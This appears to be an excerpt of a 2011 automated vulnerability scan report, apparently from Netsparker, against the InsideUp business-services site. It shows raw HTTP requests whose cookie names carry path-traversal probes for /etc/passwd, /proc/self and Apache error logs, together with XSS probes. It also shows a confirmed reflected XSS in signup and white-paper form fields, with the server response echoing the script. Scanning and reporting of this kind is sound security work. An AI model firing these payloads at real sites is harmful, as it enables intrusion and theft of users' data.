OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName=Smith&parentPage=3&phone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004AB)%3c%2fscript%3e&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:26 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=95092FFA8350006F73409A3543069D56; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="'"--></style></script><script>netsparker(0x0004AB)</script>"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST '"--></style></script><script>alert(0x0004B5)</script>
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
password1 POST 3
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 323
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004B5)%3c%2fscript%3e&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&password1=3&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:30 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=41211F516C1BD275CE97020CCF8C6874; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
